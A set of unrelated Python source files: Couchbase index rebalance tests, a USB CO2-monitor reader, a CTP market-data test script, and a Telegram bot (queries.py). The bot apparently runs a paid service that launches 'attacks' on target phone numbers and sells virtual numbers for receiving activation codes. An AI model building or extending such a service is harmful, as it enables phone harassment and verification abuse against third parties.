bucket_size=bucket_size)
testuser = []
rolelist = []
for bucket in buckets:
testuser.append({'id': bucket, 'name': bucket, 'password': 'password'})
rolelist.append({'id': bucket, 'name': bucket, 'roles': 'admin'})
self.add_built_in_server_user(testuser=testuser, rolelist=rolelist)
buckets = []
for bucket in self.buckets:
if bucket.name.startswith("plasma_bucket"):
buckets.append(bucket)
return buckets
def _verify_gsi_rebalance(self):
node_map = self._get_nodes_with_version()
for node, vals in node_map.items():
if vals["version"] < "5":
return
self.rest = RestConnection(self.master)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
nodes_out_list = self.get_nodes_from_services_map(service_type="index")
# rebalance out a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [nodes_out_list])
reached = RestHelper(self.rest).rebalance_reached()
rebalance.result()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
self.n1ql_helper.verify_indexes_redistributed(
map_before_rebalance, map_after_rebalance, stats_map_before_rebalance,
stats_map_after_rebalance, [], [nodes_out_list])
# Add back the node that was removed, and use alter index to move an index to that node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[nodes_out_list], [], services=["kv,index,n1ql"])
reached = RestHelper(self.rest).rebalance_reached()
rebalance.result()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
self._verify_alter_index()
self.sleep(120)
def _verify_alter_index(self):
index_nodes = self.get_nodes_from_services_map(service_type="index", get_all_nodes=True)
rest = RestConnection(self.master)
index_map = rest.get_index_status()
log.info("index_map: {0}".format(index_map))
index_info = index_map[self.buckets[0].name]
for index_name, index_vals in index_info.items():
host = index_vals["hosts"]
for index_node in index_nodes:
ip_str = index_node.ip + ":" + index_node.port
if host != ip_str:
alter_index_query = "ALTER INDEX {0}.{1} with {{'action':'move','nodes':['{2}:{3}']}}".format(
self.buckets[0].name, index_name, index_node.ip, index_node.port)
result = self.n1ql_helper.run_cbq_query(query=alter_index_query, server=self.n1ql_node)
self.assertEqual(result['status'], 'success', 'Query was not run successfully')
return
def _verify_index_partitioning(self):
node_map = self._get_nodes_with_version()
for node, vals in node_map.items():
if vals["version"] < "5.5":
return
indexer_node = self.get_nodes_from_services_map(service_type="index")
# Set indexer storage mode
rest = RestConnection(indexer_node)
rest.set_index_settings({"indexer.numPartitions": 2})
queries = []
for bucket in self.buckets:
create_partitioned_index1_query = f"CREATE INDEX partitioned_idx1 ON {bucket.name}(name, age, join_yr) " \
f"partition by hash(name, age, join_yr) USING GSI;"
create_index1_query = f"CREATE INDEX non_partitioned_idx1 ON {bucket.name}(name, age, join_yr) USING GSI;"
try:
self.n1ql_helper.run_cbq_query(query=create_partitioned_index1_query, server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index1_query, server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
# Scans
# 1. Small lookup query with equality predicate on the partition key
query_details = {"query": f"select name, age, join_yr from {bucket.name} USE INDEX" +
" ({0}) where name='Kala'",
"partitioned_idx_name": "partitioned_idx1",
"non_partitioned_idx_name": "non_partitioned_idx1"}
queries.append(query_details)
# 2. Pagination query with equality predicate on the partition key
query_details = {
"query": f"select name, age, join_yr from {bucket.name} USE INDEX" +
" ({0}) where name is not missing AND age=50 offset 0 limit 10",
"partitioned_idx_name": "partitioned_idx1", "non_partitioned_idx_name": "non_partitioned_idx1"}
queries.append(query_details)
# 3. Large aggregated query
query_details = {
"query": f"select count(name), age from {bucket.name} USE INDEX" +
" ({0}) where name is not missing group by age",
"partitioned_idx_name": "partitioned_idx1", "non_partitioned_idx_name": "non_partitioned_idx1"}
queries.append(query_details)
# 4. Scan with large result sets
query_details = {
"query": f"select name, age, join_yr from {bucket.name} USE INDEX" +
" ({0}) where name is not missing AND age > 50",
"partitioned_idx_name": "partitioned_idx1", "non_partitioned_idx_name": "non_partitioned_idx1"}
queries.append(query_details)
failed_queries = []
for query_details in queries:
try:
query_partitioned_index = query_details["query"].format(query_details["partitioned_idx_name"])
query_non_partitioned_index = query_details["query"].format(query_details["non_partitioned_idx_name"])
result_partitioned_index = self.n1ql_helper.run_cbq_query(query=query_partitioned_index,
server=self.n1ql_node)["results"]
result_non_partitioned_index = self.n1ql_helper.run_cbq_query(query=query_non_partitioned_index,
server=self.n1ql_node)["results"]
if sorted(result_partitioned_index) != sorted(result_non_partitioned_index):
failed_queries.append(query_partitioned_index)
log.warning("*** This query does not return same results for partitioned and non-partitioned "
"indexes.")
except Exception as ex:
log.info(str(ex))
msg = "Some scans did not yield the same results for partitioned index and non-partitioned indexes"
self.assertEqual(len(failed_queries), 0, msg)
def _return_maps(self):
index_map = self.get_index_map()
stats_map = self.get_index_stats(perNode=False)
return index_map, stats_map
def disable_upgrade_to_plasma(self, indexer_node):
rest = RestConnection(indexer_node)
doc = {"indexer.settings.storage_mode.disable_upgrade": self.disable_plasma_upgrade}
rest.set_index_settings(doc)
self.sleep(10)
remote = RemoteMachineShellConnection(indexer_node)
remote.stop_server()
self.sleep(30)
remote.start_server()
self.sleep(30)
def set_batch_size(self, indexer_node, batch_size=5):
rest = RestConnection(indexer_node)
doc = {"indexer.settings.build.batch_size": batch_size}
rest.set_index_settings(doc)
self.sleep(10)
remote = RemoteMachineShellConnection(indexer_node)
remote.stop_server()
self.sleep(30)
remote.start_server()
self.sleep(30)
def get_batch_size(self, indexer_node):
rest = RestConnection(indexer_node)
json_settings = rest.get_index_settings()
return json_settings["indexer.settings.build.batch_size"]
def _verify_indexer_storage_mode(self, indexer_node):
indexer_info = "{0}:8091".format(indexer_node.ip)
rest = RestConnection(indexer_node)
index_metadata = rest.get_indexer_metadata()["status"]
node_map = self._get_nodes_with_version()
for node in node_map.keys():
if node == indexer_node.ip:
if node_map[node]["version"] < "5" or \
self.gsi_type == "memory_optimized":
return
else:
if self.disable_plasma_upgrade:
gsi_type = "forestdb"
else:
gsi_type = "plasma"
for index_val in index_metadata:
if index_val["hosts"] == indexer_info:
self.assertEqual(index_val["indexType"], gsi_type,
"GSI type is not {0} after upgrade for index {1}".format(gsi_type, index_val["name"]))
def _verify_throttling(self, indexer_node):
indexer_info = "{0}:8091".format(indexer_node.ip)
rest = RestConnection(indexer_node)
index_metadata = rest.get_indexer_metadata()["status"]
index_building = 0
index_created = 0
for index_val in index_metadata:
if index_val["hosts"] == indexer_info:
index_building = index_building + (index_val["status"].lower() == "building")
index_created = index_created + (index_val["status"].lower() == "created")
batch_size = self.get_batch_size(indexer_node)
self.assertGreaterEqual(batch_size, -1, "Batch size is less than -1. Failing")
if batch_size == -1:
self.assertEqual(index_created, 0, "{0} indexes are in created state when batch size is -1".format(index_created))
return
if batch_size == 0:
self.assertEqual(index_created, 0, "{0} indexes are in building when batch size is 0".format(index_building))
return
if batch_size > 0:
self.assertLessEqual(index_building, batch_size, "{0} indexes are in building when batch size is {1}".format(index_building, batch_size))
return
|
co2meter.py
|
""" Class for reading data from CO2 monitor.
(c) Vladimir Filimonov, 2016-2018
E-mail: vladimir.a.filimonov@gmail.com
"""
try:
import hid
except AttributeError as e:
if 'windll' in e.message:
raise ImportError(('Import failed with an error "AttributeError: %s". '
'Possibly there''s a name conflict. Please check if '
'library "hid" is instlled and if so - uninstall it, '
'keeping only "hidapi".' % str(e)))
else:
raise
import datetime as dt
from contextlib import contextmanager
import threading
import time
import os
plt = None # To be imported on demand only
try:
import pandas as pd
except ImportError:
pd = None
_CO2MON_HID_VENDOR_ID = 0x04d9
_CO2MON_HID_PRODUCT_ID = 0xa052
_CO2MON_MAGIC_WORD = b'Htemp99e'
_CO2MON_MAGIC_TABLE = (0, 0, 0, 0, 0, 0, 0, 0)
_CODE_END_MESSAGE = 0x0D
_CODE_CO2 = 0x50
_CODE_TEMPERATURE = 0x42
_COLORS = {'r': (0.86, 0.37, 0.34),
'g': (0.56, 0.86, 0.34),
'b': 'b'}
CO2_HIGH = 1200
CO2_LOW = 800
#############################################################################
def now():
return dt.datetime.now().replace(microsecond=0)
#############################################################################
def list_to_longint(x):
return sum([val << (i * 8) for i, val in enumerate(x[::-1])])
#############################################################################
def longint_to_list(x):
return [(x >> i) & 0xFF for i in (56, 48, 40, 32, 24, 16, 8, 0)]
#############################################################################
def convert_temperature(val):
""" Convert temperature from Kelvin (unit of 1/16th K) to Celsius
"""
return val * 0.0625 - 273.15
#############################################################################
# Class to operate with CO2 monitor
#############################################################################
class CO2monitor:
def __init__(self, bypass_decrypt=False):
""" Initialize the CO2monitor object and retrieve basic HID info.
Args:
bypass_decrypt (bool): For certain CO2 meter models packages that
are sent over USB are not encrypted. In this case instance
of CO2monitor will return no data in .read_data().
If this happens, setting bypass_decrypt to True might
solve the issue.
See also:
https://github.com/vfilimonov/co2meter/issues/16
"""
self.bypass_decrypt = bypass_decrypt
self._info = {'vendor_id': _CO2MON_HID_VENDOR_ID,
'product_id': _CO2MON_HID_PRODUCT_ID}
self._h = hid.device()
# Number of requests to open connection
self._status = 0
self._magic_word = [((w << 4) & 0xFF) | (w >> 4)
for w in bytearray(_CO2MON_MAGIC_WORD)]
self._magic_table = _CO2MON_MAGIC_TABLE
self._magic_table_int = list_to_longint(_CO2MON_MAGIC_TABLE)
# Initialisation of continuous monitoring
if pd is None:
self._data = []
else:
self._data = pd.DataFrame()
self._keep_monitoring = False
self._interval = 10
# Device info
with self.co2hid():
self._info['manufacturer'] = self._h.get_manufacturer_string()
self._info['product_name'] = self._h.get_product_string()
self._info['serial_no'] = self._h.get_serial_number_string()
#########################################################################
def hid_open(self, send_magic_table=True):
""" Open connection to HID device. If connection is already open,
then only the counter of requests is incremented (so hid_close()
knows how many sub-processes keep the HID handle)
Parameters
----------
send_magic_table : bool
If True then the internal "magic table" will be sent to
the device (it is used for decryption)
"""
if self._status == 0:
# If connection was not opened before
self._h.open(self._info['vendor_id'], self._info['product_id'])
if send_magic_table:
self._h.send_feature_report(self._magic_table)
self._status += 1
def hid_close(self, force=False):
""" Close connection to HID device. If there were several hid_open()
attempts then the connection will be closed only after respective
number of calls to hid_close() method
Parameters
----------
force : bool
Force-close of connection irrespectively of the counter of
open requests
"""
if force:
self._status = 0
elif self._status > 0:
self._status -= 1
if self._status == 0:
self._h.close()
def hid_read(self):
""" Read 8-byte string from HID device """
msg = self._h.read(8)
return self._decrypt(msg)
@contextmanager
def co2hid(self, send_magic_table=True):
self.hid_open(send_magic_table=send_magic_table)
try:
yield
finally:
self.hid_close()
#########################################################################
@property
def info(self):
""" Device info """
return self._info
@property
def is_alive(self):
""" If the device is still connected """
try:
with self.co2hid(send_magic_table=True):
return True
except:
return False
#########################################################################
def _decrypt(self, message):
""" Decode message received from CO2 monitor.
"""
if self.bypass_decrypt:
return message
# Rearrange message and convert to long int
msg = list_to_longint([message[i] for i in [2, 4, 0, 7, 1, 6, 5, 3]])
# XOR with magic_table
res = msg ^ self._magic_table_int
# Cyclic shift by 3 to the right
res = (res >> 3) | ((res << 61) & 0xFFFFFFFFFFFFFFFF)
# Convert to list
res = longint_to_list(res)
# Subtract and convert to uint8
res = [(r - mw) & 0xFF for r, mw in zip(res, self._magic_word)]
return res
@staticmethod
def decode_message(msg):
""" Decode value from the decrypted message
Parameters
----------
msg : list
Decrypted message retrieved with hid_read() method
Returns
-------
CntR : int
CO2 concentration in ppm
Tamb : float
Temperature in Celsius
"""
# Expected 3 zeros at the end
bad_msg = (msg[5] != 0) or (msg[6] != 0) or (msg[7] != 0)
# End of message should be 0x0D
bad_msg |= msg[4] != _CODE_END_MESSAGE
# Check sum: LSB of sum of first 3 bytes
bad_msg |= (sum(msg[:3]) & 0xFF) != msg[3]
if bad_msg:
return None, None
value = (msg[1] << 8) | msg[2]
if msg[0] == _CODE_CO2: # CO2 concentration in ppm
return int(value), None
elif msg[0] == _CODE_TEMPERATURE: # Temperature in Celsius
return None, convert_temperature(value)
else: # Other codes - so far not decoded
return None, None
def _read_co2_temp(self, max_requests=50):
""" Read one pair of values from the device.
HID device should be open before
"""
co2, temp = None, None
for ii in range(max_requests):
_co2, _temp = self.decode_message(self.hid_read())
if _co2 is not None:
co2 = _co2
if _temp is not None:
temp = _temp
if (co2 is not None) and (temp is not None):
break
return now(), co2, temp
#########################################################################
def read_data_raw(self, max_requests=50):
with self.co2hid(send_magic_table=True):
vals = self._read_co2_temp(max_requests=max_requests)
self._last_data = vals
return vals
def read_data(self, max_requests=50):
""" Listen to values from device and retrieve temperature and CO2.
Parameters
----------
max_requests : int
Effective timeout: number of attempts after which None is returned
Returns
-------
tuple (timestamp, co2, temperature)
or
pandas.DataFrame indexed with timestamp
Results of measurements
"""
if self._keep_monitoring:
if pd is None:
return self._data[-1]
else:
return self._data.iloc[[-1]]
else:
vals = self.read_data_raw(max_requests=max_requests)
# If pandas is available - return pandas.DataFrame
if pd is not None:
vals = pd.DataFrame({'co2': vals[1], 'temp': vals[2]},
index=[vals[0]])
return vals
#########################################################################
def _monitoring(self):
""" Private function for continuous monitoring.
"""
with self.co2hid(send_magic_table=True):
while self._keep_monitoring:
vals = self._read_co2_temp(max_requests=1000)
if pd is None:
self._data.append(vals)
else:
vals = pd.DataFrame({'co2': vals[1], 'temp': vals[2]},
index=[vals[0]])
self._data = self._data.append(vals)
time.sleep(self._interval)
def start_monitoring(self, interval=5):
""" Start continuous monitoring of the values and collecting them
in the list / pandas.DataFrame.
The monitoring is started in a separate thread, so the current
interpreter session is not blocked.
Parameters
----------
interval : float
Interval in seconds between consecutive data reads
"""
self._interval = interval
if self._keep_monitoring:
# If already started then we should not start a new thread
return
self._keep_monitoring = True
t = threading.Thread(target=self._monitoring)
t.start()
def stop_monitoring(self):
""" Stop continuous monitoring
"""
self._keep_monitoring = False
#########################################################################
@property
def data(self):
""" All data retrieved with continuous monitoring
"""
return self._data
def log_data_to_csv(self, fname):
""" Log data retrieved with continuous monitoring to CSV file. If the
file already exists, then it will be appended.
Note, that the method requires pandas package (so far alternative
is not implemented).
Parameters
----------
fname : string
Filename
"""
if pd is None:
raise NotImplementedError('Logging to CSV is implemented '
'using pandas package only (so far)')
if os.path.isfile(fname):
# Check the last line to get the timestamp of the last record
df = pd.read_csv(fname)
last = pd.Timestamp(df.iloc[-1, 0])
# Append only new data
with open(fname, 'a') as f:
self._data[self._data.index > last].to_csv(f, header=False)
else:
self._data.to_csv(fname)
#############################################################################
def read_csv(fname):
""" Read data from CSV file.
Parameters
----------
fname : string
Filename
"""
if pd is None:
raise NotImplementedError('Reading CSV files is implemented '
'using pandas package only (so far)')
return pd.read_csv(fname, index_col=0, parse_dates=0)
#############################################################################
def plot(data, plot_temp=False, ewma_halflife=30., **kwargs):
""" Plot recorded data
Parameters
----------
data : pandas.DataFrame
Data indexed by timestamps. Should have columns 'co2' and 'temp'
plot_temp : bool
If True temperature will be also plotted
ewma_halflife : float
If specified (not None) data will be smoothed using EWMA
"""
global plt
if plt is None:
import matplotlib.pyplot as _plt
plt = _plt
if pd is None:
raise NotImplementedError('Plotting is implemented so far '
'using pandas package only')
# DataFrames
if (ewma_halflife is not None) and (ewma_halflife > 0):
halflife = pd.Timedelta(ewma_halflife, 's') / pd.np.mean(pd.np.diff(data.index))
co2 = pd.ewma(data.co2, halflife=halflife, min_periods=0)
temp = pd.ewma(data.temp, halflife=2 * halflife, min_periods=0)
else:
co2 = data.co2
temp = data.temp
co2_r = co2.copy()
co2_g = co2.copy()
co2_r[co2_r <= CO2_HIGH] = pd.np.NaN
co2_g[co2_g >= CO2_LOW] = pd.np.NaN
# Plotting
ax = kwargs.pop('ax', plt.gca())
ax.fill_between(co2_r.index, co2_r.values, CO2_HIGH,
alpha=0.5, color=_COLORS['r'])
ax.fill_between(co2_g.index, co2_g.values, CO2_LOW,
alpha=0.5, color=_COLORS['g'])
ax.axhline(CO2_LOW, color=_COLORS['g'], lw=2, ls='--')
ax.axhline(CO2_HIGH, color=_COLORS['r'], lw=2, ls='--')
ax.plot(co2.index, co2.values, lw=2, color='k')
yl = ax.get_ylim()
ax.set_ylim([min(600, yl[0]), max(1400, yl[1])])
ax.set_ylabel('CO2 concentration, ppm')
plt.setp(ax.xaxis.get_majorticklabels(), rotation=0,
horizontalalignment='center')
if plot_temp:
ax2 = ax.twinx()
ax2.plot(temp.index, temp.values, color=_COLORS['b'])
ax2.set_ylabel('Temperature, C')
yl = ax2.get_ylim()
ax2.set_ylim([min(19, yl[0]), max(23, yl[1])])
ax2.grid('off')
plt.tight_layout()
#############################################################################
# Entry points
#############################################################################
def start_server():
from .server import start_server as start
start()
|
queries.py
|
import threading
from typing import Any
import pandas as pd
from io import BytesIO
from asyncio import sleep
from datetime import timedelta
from aiohttp import ClientSession
from datetime import datetime as dt
from qiwipyapi import Wallet
from aiogram.dispatcher.storage import FSMContext
from aiogram.types import (CallbackQuery, InlineKeyboardMarkup,
InlineKeyboardButton, ReplyKeyboardMarkup,
Message)
from objects import globals
from formats import dateTime
from db_models.FAO import FAO
from states.states import States
from db_models.UserAuth import UserAuth
from db_models.UserData import UserData
from temp.select_lang import select_lang
from objects.globals import dp, bot, config
from temp.lang_keyboards import lang_keyboard
WALLET: Wallet = Wallet(
globals.config["qiwi_phone"], p2p_sec_key=globals.config["qiwi_private_key"])
@dp.callback_query_handler(lambda query: query.data.startswith(("language")))
async def select_language(query: CallbackQuery):
""" Select language
:param: query
:type: CallbackQuery
:return: Bot message
:rtype: Message
"""
change_language: UserAuth = await UserAuth.objects.get(login=query.from_user.id)
await change_language.update(language=query.data.split("_")[1])
await bot.delete_message(chat_id=query.from_user.id, message_id=query.message.message_id,)
return await bot.send_message(chat_id=query.from_user.id,
text=select_lang[query.data.split("_")[1]],
reply_markup=ReplyKeyboardMarkup(resize_keyboard=True, keyboard=lang_keyboard[query.data.split("_")[1]]))
@dp.callback_query_handler(lambda query: query.data == "change_language")
async def change_language(query: CallbackQuery):
""" Change language
:param: query
:type: CallbackQuery
:return: Bot edit message
:rtype: Message
"""
languages_markup: InlineKeyboardMarkup = InlineKeyboardMarkup(
inline_keyboard=[
[InlineKeyboardButton(text="🇬🇧ENG", callback_data="language_ENG")],
[InlineKeyboardButton(text="🇷🇺RU", callback_data="language_RU")]
])
await bot.edit_message_text(chat_id=query.from_user.id, message_id=query.message.message_id,
text="🌐Select the language", reply_markup=languages_markup)
@dp.callback_query_handler(lambda query: query.data == "stoped_attack")
async def stoped_attack(query: CallbackQuery):
""" Stoped attack
:param: query
:type: CallbackQuery
:return: Bot edit message
:rtype: Message
"""
await globals.client_session_object.stop()
#thread = threading.Thread(target=globals.client_session_object.stop, args=())
#await thread.start()
main_user_data: UserAuth = await UserAuth.objects.get(login=query.from_user.id)
if main_user_data == "RU":
text: str = "✅Атака остановлена"
else:
text: str = "✅Attack stopped"
await bot.edit_message_text(chat_id=query.from_user.id, message_id=query.message.message_id,
text=text)
@dp.callback_query_handler(lambda query: query.data == "info_about_the_last_attack")
async def get_info_about_the_last_attack(query: CallbackQuery):
""" Get info about the last attack
:param: query
:type: CallbackQuery
:return: Bot edit message
:rtype: Message
"""
main_user_data: UserAuth = await UserAuth.objects.get(login=query.from_user.id)
user_data: UserData = await UserData.objects.filter(user_id=query.from_user.id).all()
if not user_data:
if main_user_data.language == "RU":
have_not_attack_text: str = "Вы еще не совершали атаку!"
else:
have_not_attack_text: str = "You haven't made an attack yet"
return await bot.edit_message_text(chat_id=query.from_user.id, message_id=query.message.message_id,
text=have_not_attack_text)
user_data = user_data[0]
if main_user_data.language == "RU":
unknow_msg: str = "Неизвестно"
else:
unknow_msg: str = "Unknow"
phone: Any = user_data.last_phone if user_data.last_phone != None else unknow_msg
date: Any = dateTime.datetime_format(
user_data.last_created) if user_data.last_created != None else unknow_msg
return await bot.edit_message_text(chat_id=query.from_user.id, message_id=query.message.message_id,
text=f"📄Информация о последней атаке ➜\n\n"
f"💎Статус: {user_data.status} кругов\n"
f"〰️\n"
f"☎️Номер телефона: {phone}\n"
f"〰️\n"
f"📅Дата и время: {date}")
@dp.callback_query_handler(lambda query: query.data == "top_up_balance")
async def top_up_balance(query: CallbackQuery):
""" Set the amount to top up ()
:param: query
:type: CallbackQuery
:return: Bot edit message
:rtype: Message
"""
main_user_data: UserAuth = await UserAuth.objects.get(login=query.from_user.id)
if main_user_data.language == "RU":
top_up_text: str = "Введите сумму для пополения:"
else:
top_up_text: str = "Enter the amount to top up:"
await bot.edit_message_text(chat_id=query.from_user.id, message_id=query.message.message_id,
text=top_up_text)
await States.get_amount_balance_targ.set()
@dp.message_handler(state=States.get_amount_balance_targ)
async def get_amount_balance(message: Message, state: FSMContext):
""" Get the amount to top up
:param: message
:type: Message
:param: state
:type: FSMContext
:return: Bot edit message
:rtype: Message
"""
await state.finish()
try:
amount: float = float(message.text)
invoice = WALLET.create_invoice(
value=amount, expirationDateTime=dateTime.datetime_format(dt.now()+timedelta(hours=3)))
main_user_data: UserAuth = await UserAuth.objects.get(login=message.from_user.id)
if main_user_data.language == "RU":
payment_text_button: str = "Продолжить оплату"
payment_text_message: str = "Продолжить оплату?"
successfull_payment: str = "Ваш баланс успешно пополнен на %.2f₽"
correct_input_msg: str = "Правильный формат ввода суммы - 10 или 10.0"
else:
payment_text_button: str = "Continue"
payment_text_message: str = "Continue?"
successfull_payment: str = "Your balance has been successfully credited to %.2f₽"
correct_input_msg: str = "The correct format for entering the amount - 10 or 10.0"
payment_url: InlineKeyboardMarkup = InlineKeyboardMarkup(
inline_keyboard=[
[InlineKeyboardButton(
text=payment_text_button, url=invoice["payUrl"])]
])
await message.answer(text=payment_text_message, reply_markup=payment_url)
while True:
status = WALLET.invoice_status(bill_id=invoice["billId"])
if status["status"]["value"] == "PAID":
update_balance: UserAuth = await UserAuth.objects.get(login=message.from_user.id)
new_value_to_balance: float = float(
update_balance.balance) + amount
await update_balance.update(balance=new_value_to_balance)
return await message.answer(successfull_payment % amount)
await sleep(5)
except ValueError:
return await message.answer(text=correct_input_msg)
@dp.callback_query_handler(lambda query: query.data == "get_history_activations")
async def get_history_activation(query: CallbackQuery):
""" Get history activation
:param: query
:type: CallbackQuery
:return: Bot document
:rtype: Message
"""
main_user_data: UserAuth = await UserAuth.objects.get(login=query.from_user.id)
fao_data: FAO = await FAO.objects.filter(user_id=query.from_user.id).all()
if main_user_data.language == "RU":
wait_loading_text: str = "Дождитесь загрузки..."
columns: list = ["ID", "Дата и время", "Сервис", "Цена"]
else:
wait_loading_text: str = "Wait for loading ..."
columns: list = ["ID", "Date and time", "Service", "Price"]
all_data: list = []
all_data.append([id.id for id in fao_data])
all_data.append([created.created for created in fao_data])
all_data.append([service.service for service in fao_data])
all_data.append([price.price for price in fao_data])
to_write: BytesIO = BytesIO()
data_dict: dict = dict(zip(columns, all_data))
df = pd.DataFrame(data_dict)
df.to_excel(to_write)
await bot.edit_message_text(chat_id=query.from_user.id, message_id=query.message.message_id,
text=wait_loading_text)
return await bot.send_document(query.message.chat.id, document=("activation.xlsx", to_write.getvalue()))
@dp.callback_query_handler(lambda query: query.data.startswith(("num")))
async def pay_number(query: CallbackQuery):
""" Pay number virtual phone
:param: query
:type: CallbackQuery
:return: Bot message or bot edit message
:rtype: Message
"""
metadata_service: list = query.data.split("_")
del metadata_service[0]
service, price = metadata_service
balance: UserAuth = await UserAuth.objects.get(login=query.from_user.id)
host_site_api, api_key = config["host_site_api"], config["api_key"]
if int(balance.balance) < int(price):
return await bot.edit_message_text(chat_id=query.from_user.id, message_id=query.message.message_id,
text="У вас недостаточно средств!")
# Get virtual phone request
async with ClientSession() as client_session:
url_format: str = (f"http://{host_site_api}/stubs/handler_api.php?api_key={api_key}"
f"&action=getNumber&service={service}&operator=any&country=russia")
async with client_session.get(url_format) as resp:
phone = await resp.text()
await client_session.close()
if phone == "NO_NUMBERS":
return await query.answer("Номера отсутствуют!")
elif phone == "NO_BALANCE":
host_site_main: str = config["host_site_main"]
await bot.send_message(config["chat_id"], text=f"Нужно пополнить счет! https://{host_site_main}")
await query.answer(text="Неизвестная ошибка!")
else:
status_phone, id_phone, self_phone = phone.split(":")
cancel_phone: InlineKeyboardMarkup = InlineKeyboardMarkup(
inline_keyboard=[
[InlineKeyboardButton(
text="Отменить", callback_data=f"cancel-num_{id_phone}")]
])
# Found virtual phone page
await bot.edit_message_text(chat_id=query.message.chat.id, message_id=query.message.message_id,
text=f"Status: <b>{status_phone}</b>\n"
f"ID: <code>{id_phone}</code>\n"
f"Number: <code>{self_phone}</code>", reply_markup=cancel_phone)
while True:
# GET ID ORDER request
async with ClientSession() as client_session:
url_format: str = (f"http://{host_site_api}/stubs/handler_api.php?"
f"api_key={api_key}&action=getStatus&id={id_phone}")
async with client_session.get(url_format) as get_id:
get_id = await get_id.text()
if get_id.startswith(("STATUS_OK")):
# UPDATE BALANCE
new_balance: float = float(balance.balance) - float(price)
await balance.update(balance=new_balance)
# CREATE NEW ORDER
await FAO.objects.create(user_id=query.from_user.id, service=service, price=price)
# Code
code: str = get_id.split(":")[1]
# Return code
return await bot.send_message(query.message.chat.id, text=f"Code: <code>{code}</code>")
@dp.callback_query_handler(lambda query: query.data.startswith(("cancel-num")))
async def cancel_number(query: CallbackQuery):
""" Cancel number
:param: query
:type: CallbackQuery
:return: Bot answer message
:rtype: Message
"""
cancel_id_number: str = query.data.replace("_", " ").split()[1]
host_site_api: str = config["host_site_api"]
api_key: str = config["api_key"]
async with ClientSession() as session:
# CANCEL ORDER request
url_format: str = (f"http://{host_site_api}/stubs/handler_api.php?"
f"api_key={api_key}&action=setStatus&status=-1&id={cancel_id_number}")
async with session.post(url_format) as resp:
resp = await resp.text()
if resp == "ACCESS_CANCEL":
await query.answer(text="Номер успешно отменен.")
await bot.delete_message(query.message.chat.id, query.message.message_id)
|
mdtest.py
|
# encoding: UTF-8
import sys,os
from time import sleep
#from qtpy import QtGui
vnpy_root = os.path.abspath(os.path.join(os.path.dirname(__file__),'..','..','..','..','..'))
if vnpy_root not in sys.path:
print(u'append {}'.format(vnpy_root))
sys.path.append(vnpy_root)
from vnpy.api.ctp_se.vnctpmd import MdApi
from threading import Thread
#----------------------------------------------------------------------
def print_dict(d):
"""按照键值打印一个字典"""
for key,value in d.items():
print( key + ':' + str(value))
#----------------------------------------------------------------------
def simple_log(func):
"""简单装饰器用于输出函数名"""
def wrapper(*args, **kw):
print( "")
print( str(func.__name__))
return func(*args, **kw)
return wrapper
########################################################################
class TestMdApi(MdApi):
"""测试用实例"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
super(TestMdApi, self).__init__()
self.is_connected = False
#----------------------------------------------------------------------
@simple_log
def onFrontConnected(self):
"""服务器连接"""
print('tdtest.py: onFrontConnected')
self.is_connected = True
#----------------------------------------------------------------------
@simple_log
def onFrontDisconnected(self, n):
"""服务器断开"""
print (n)
self.is_connected = False
#----------------------------------------------------------------------
@simple_log
def onHeartBeatWarning(self, n):
"""心跳报警"""
print (n)
#----------------------------------------------------------------------
@simple_log
def onRspError(self, error, n, last):
"""错误"""
print_dict(error)
@simple_log
#----------------------------------------------------------------------
def onRspUserLogin(self, data, error, n, last):
"""登陆回报"""
print_dict(data)
print_dict(error)
print('onRspUserLogin')
#----------------------------------------------------------------------
@simple_log
def onRspUserLogout(self, data, error, n, last):
"""登出回报"""
print_dict(data)
print_dict(error)
#----------------------------------------------------------------------
@simple_log
def onRspSubMarketData(self, data, error, n, last):
"""订阅合约回报"""
print_dict(data)
print_dict(error)
#----------------------------------------------------------------------
@simple_log
def onRspUnSubMarketData(self, data, error, n, last):
"""退订合约回报"""
print_dict(data)
print_dict(error)
#----------------------------------------------------------------------
@simple_log
def onRtnDepthMarketData(self, data):
"""行情推送"""
print_dict(data)
#----------------------------------------------------------------------
@simple_log
def onRspSubForQuoteRsp(self, data, error, n, last):
"""订阅合约回报"""
print_dict(data)
print_dict(error)
#----------------------------------------------------------------------
@simple_log
def onRspUnSubForQuoteRsp(self, data, error, n, last):
"""退订合约回报"""
print_dict(data)
print_dict(error)
#----------------------------------------------------------------------
@simple_log
def onRtnForQuoteRsp(self, data):
"""行情推送"""
print_dict(data)
# 长江
md_addr = "tcp://124.74.10.62:47213"
td_addr = "tcp://124.74.10.62:43205"
# 银河联通:
#md_addr = "tcp://114.255.82.175:31213"
#td_addr = "tcp://114.255.82.175:31205"
# 银河电信
#md_addr = "tcp://106.39.36.72:31213"
#td_addr = "tcp://106.39.36.72:31205"
user_id = "xxx"
user_pass = "xxx@123"
app_id = "xx.0.0"
auth_code = "xx"
broker_id = '4300'
#----------------------------------------------------------------------
def main():
"""主测试函数,出现堵塞时可以考虑使用sleep"""
reqid = 0
# 创建Qt应用对象,用于事件循环
#app = QtGui.QApplication(sys.argv)
# 创建API对象
api = TestMdApi()
# 在C++环境中创建MdApi对象,传入参数是希望用来保存.con文件的地址
print('create mdapi')
api.createFtdcMdApi('')
# 注册前置机地址
print('mdtest:registerFront:{}'.format(md_addr))
api.registerFront(md_addr)
# 初始化api,连接前置机
api.init()
sleep(0.5)
print('mdtest: login')
# 登陆
loginReq = {} # 创建一个空字典
loginReq['UserID'] = user_id # 参数作为字典键值的方式传入
loginReq['Password'] = user_pass # 键名和C++中的结构体成员名对应
loginReq['BrokerID'] = broker_id
reqid = reqid + 1 # 请求数必须保持唯一性
i = api.reqUserLogin(loginReq, 1)
counter = 0
while (True):
if api.is_connected:
break
sleep(1)
counter += 1
print('waiting {}'.format(counter))
if counter > 10:
print('time expired, connect fail, auth fail')
exit(0)
## 登出,测试出错(无此功能)
#reqid = reqid + 1
#i = api.reqUserLogout({}, 1)
#sleep(0.5)
## 安全退出,测试通过
#i = api.exit()
## 获取交易日,目前输出为空
#day = api.getTradingDay()
#print 'Trading Day is:' + str(day)
#sleep(0.5)
